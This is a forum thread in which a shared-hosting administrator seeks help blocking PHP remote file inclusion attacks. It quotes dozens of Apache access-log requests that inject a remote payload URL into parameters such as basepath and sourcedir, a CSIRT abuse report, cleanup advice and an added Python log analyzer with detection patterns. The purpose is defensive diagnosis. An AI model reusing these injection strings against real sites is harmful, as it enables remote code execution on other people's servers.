Shamsul Kamal
asked on
Anybody know how to block this specific PHP Inject attack using Mod_Security2 in cPanel?
Hi,
I would like to request some assistance.
Does anybody know how to block the following "WEB-PHP remote include path" attack using mod_security?
I have tried using the default mod_security rules and also the mod_security rules from http://www.timmit.nl/modsec2.user.conf.
But it seems that mod_security is not functioning well, since the PHP inject script is still able to run on my server.
The following are the "WEB-PHP remote include path" entries that I mentioned, taken from the Apache access log.
==========================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
==========================
I would appreciate it if anybody can help to stop this attack.
Thank you,
Regards,
Sham
SOLUTION
You will still get those things in the log even if mod_security is installed. The effect is that the attack won't stop, but nothing happens on your server. Every webserver is under attack from bots/scripts, etc., and each attempt is typically logged in the log.
ASKER
Ehm ....
I think the attack is still happening on my server because I received a report today from my datacenter that there is hacking activity against other servers coming from my server using this PHP inject method...
Their email is as follows:
-----Original Message-----
From: soc@brasiltelecom.com.br [mailto:soc@brasiltelecom.com.br]
Sent: Monday, June 16, 2008 5:29 AM
Cc: cert@cert.br
Subject: Incident ID: BRT563785 Sent to abuse@piradius.net
Importance: High
Dear Sirs,
  It was detected on Brasil Telecom's monitoring systems that the
 machine listed in this mail has been maliciously used. The traffic details are
below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.
  Therefore the IP 124.217.243.21 will be blocked on all our Data Centers for 60 minutes.
  To reply this e-mail, please keep the ID BRT563785 in the Subject Field.
Thanks,
CSIRT Brasil Telecom
2008-06-15 05:55:43 GMT
124.217.243.21 1:2002 WEB-PHP remote include path
Dear responsible parties,
  It was identified through Brasil Telecom's security monitoring that the
machine listed below is being used for malicious purposes on the
Internet (Note that the date is in the following format:
YYYY-MM-DD HH:MM:SS). Please take the appropriate actions regarding the
Incident.
  As a result, the IP 124.217.243.21 will be blocked for 60 minutes on all our Data Centers.
  When replying to this e-mail, keep the ID BRT563785 in the subject field.
Regards,
Brasil Telecom CSIRT
For more information about the detected activity(ies):
For more information about the activity visit:
http://www.snort.org/pub-bin/sigs.cgi?sid=1:2002
---
This message was sent automatically by the SOC - Security Operations Center of Brasil Telecom S.A. and may contain privileged and/or confidential information, and may not be forwarded. Should further clarification or action by the Security Incident Response team be required, please contact the SOC by telephone at +55(61)3305-5565 (24x7 service), or by e-mail at soc.nivel1@brasiltelecom.com.br.
I would really appreciate it if anybody can help.
SOLUTION
ASKER
Hi Fibo,
Thanks for the advice.
But this server is actually a shared hosting server using cPanel.
I cannot do it on a per-script basis; those scripts might belong to our hosting clients.
Using cPanel, you have access to the file directories, right?
- You can then check and clean the directories for unwanted "eggs" in your "nest".
- You can add "index.htm" or "index.php" in the directories where needed.
- You can change access rights to the directories.
<<I cannot do it on a per-script basis; those scripts might belong to our hosting clients.>>
I presume you mean "hosting provider".
I presume you have installed scripts through cPanel. The scripts (e.g. PHP) present on your site are now "your copy" and you may change them at will (check that with your provider, of course), although you will get no support for your changes.
Changing PHP scripts needs some PHP knowledge, but you don't need to be a complete expert.
You might also ask for some (charged) assistance from your provider.
ASKER
Hi Fibo,
Thanks for your advice again.
But actually, we are the hosting provider, and we received the report (the email attached in my previous post) saying that our shared hosting server has been used to maliciously hack other people's servers using PHP inject scripts.
I have around 300 domains hosted on the server.
The problems are:
1. I have no idea which scripts or domain cause the error, which makes me think mod_security is the best way to block it.
2. I cannot alter my clients' PHP files or .htaccess without their knowledge, and what's more, I don't even know which hosting account or scripts have been used for the PHP inject activities.
I would appreciate it if you could advise based on that.
OK. Sorry, I was completely in the wrong direction.
- Are you the piradius.net reported in the mail?
- Is the IP address 124.217.243.21 part of yours? Are there specific hosts on this machine?
- If this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERS' SITES...
Some random thoughts/questions:
- mod_security seems to be htaccess/mod_rewrite based, and I would think you cannot use them without your customers' consent, so it should be ruled out as a general solution.
- What does your clients' contract say? Who is responsible for their own account security?
- The logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their own sites).
- Are their sites hosted physically on the same machine as yours? Are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
- I presume you are taking backups of everything, including their sites. If not, you should until things seem fairly back to normal: it will ensure that, in case of a major problem, the disruption will be as short as possible.
ASKER
Hi,
Thanks for the advice and your comment.
Referring to your questions:
- Are you the piradius.net reported in the mail?
>> No, piradius.net is our IP provider.
- Is the IP address 124.217.243.21 part of yours? Are there specific hosts on this machine?
>> Yes, 124.217.243.21 is the main shared IP for this server.
- If this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERS' SITES...
>> I don't think so. Refer to the logs: 127.0.0.1 and 124.217.243.21 are normal when accessing an Apache 2.28 webserver. It is the way Apache logs now (new version). 100+ of my other servers also have the same log style when people access the websites hosted on the server.
Some random thoughts/questions:
- mod_security seems to be htaccess/mod_rewrite based, and I would think you cannot use them without your customers' consent, so it should be ruled out as a general solution.
>> We are providing a shared hosting service, in which for security reasons we can alter any of our terms of service and SLA.
- What does your clients' contract say? Who is responsible for their own account security?
>> Their own account security is of course their responsibility, but the overall server setup is our responsibility.
- The logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their own sites).
>> No, this is the overall Apache server log that logs everything accessed using Apache 2.28.
- Are their sites hosted physically on the same machine as yours? Are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
>> Of course not; we manage more than 5000 hosting accounts on a few of our servers.
- I presume you are taking backups of everything, including their sites. If not, you should until things seem fairly back to normal: it will ensure that, in case of a major problem, the disruption will be as short as possible.
>> Yes, we have a mirror backup: daily, weekly and monthly backups on a separate server.
OK.
Everything seems fine except your own server.
Therefore, and since your clients' directories are not under your own, you can do "whatever you want" on your own web site: you can change your own scripts as needed, etc.
The problem is then:
a - your site, and probably some others as well, are under attack from one or several hacked sites at IP address 124.217.243.21
b - one of those is most probably your own site (127.0.0.1)
c - you have found no easy way to check which of the sites is/are originating the "sniffing" of the attacks.
My thoughts:
1 - Your own site needs to be cleaned, using all or some of my suggestions or equivalent.
2 - Once this is done (i.e., you have found and cleaned at least one source of the scripts), check in the logs whether the attacks still persist. If not, MAYBE the problem is solved for now. If yes... are there still attacks coming from 127.0.0.1? If not... MAYBE your machine is cured, and some other is not.
3 - To chase other machines: if you have the legal right to do so, look at their sites' log files: are there other sites under attack? From which IPs? Are there any from 127.0.0.1? If yes, then probably these very sites have been hacked. But here you need to work with your clients to clean their sites...
4 - The sites are running on Apache, presumably on Linux. Check the whole disks with anti-virus software. Most recent anti-virus products also look for this type of trojan...
Good hunting!
ASKER CERTIFIED SOLUTION
Thx for the points.
ASKER
I did that on 8th June and still the attack happened...
I don't know how to check which domain/hosting account is involved based on the Apache access log.
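Both the log quoted in the opening question and the closing question (which requests in the access log are remote-include attempts, and what they have in common) can be answered with a small analyzer. The following is an added example, not code from the thread: it parses lines in the same combined-style format as the quoted log, percent-decodes each query parameter repeatedly (so a double-encoded %253f%253f is seen as ??), flags every parameter whose value is or embeds a remote URL, and groups the hits by source IP, parameter name, HTTP status and remote host. The sample lines are constructed in the shape of the quoted log; the format carries no virtual-host field, so mapping a hit to a hosting account still needs the per-domain logs.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed sample in the shape of the quoted log: three injection attempts
# (one double-encoded, one with the payload nested inside another parameter's
# value) plus one ordinary request.
SAMPLE_LOG = """\
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
203.0.113.5 - - [16/Jun/2008:02:41:00 +0800] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 8120
"""

# Apache combined-style line without a virtual-host field (as in the quoted log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A value that *is* a remote URL, e.g. basepath=http://host/file.txt??
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# A remote URL smuggled inside another value, e.g. cid=2//login.php?skin_dir=http://...
NESTED_REMOTE_RE = re.compile(r'[?&]([^=&?]+)=((?:https?|ftp)://\S*)', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable (bounded): '%253f' -> '%3f' -> '?'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_rfi_params(target):
    """List (parameter, remote_url) pairs found in the request target's query string."""
    query = target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        if REMOTE_VALUE_RE.match(value):
            hits.append((name, value.strip()))
            continue
        nested = NESTED_REMOTE_RE.search(value)
        if nested:
            hits.append((nested.group(1), nested.group(2)))
    return hits


def analyze(log_text):
    """Summarize RFI attempts by source IP, parameter, status and remote host."""
    summary = {"attempts": 0, "double_encoded": 0, "from_loopback": 0,
               "by_ip": Counter(), "by_param": Counter(),
               "by_status": Counter(), "remote_hosts": Counter()}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_rfi_params(rec["target"])
        if not hits:
            continue
        summary["attempts"] += 1
        summary["by_ip"][rec["ip"]] += 1
        summary["by_status"][rec["status"]] += 1
        if "%25" in rec["target"]:        # a second percent-encoding layer was present
            summary["double_encoded"] += 1
        if rec["ip"].startswith("127."):  # the connection came from this host itself
            summary["from_loopback"] += 1
        for param, url in hits:
            summary["by_param"][param] += 1
            summary["remote_hosts"][url.split("/", 3)[2]] += 1  # scheme://HOST/...
    return summary


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print(f"{result['attempts']} remote-include attempts, "
          f"{result['double_encoded']} double-encoded, "
          f"{result['from_loopback']} from loopback")
    for key in ("by_ip", "by_param", "by_status", "remote_hosts"):
        print(f"{key}: {dict(result[key])}")
```

Run it over the real access log by passing the file contents to analyze(); a non-zero from_loopback count means the requests were made from the server itself, which is the detail to chase when a datacenter reports the box as the source.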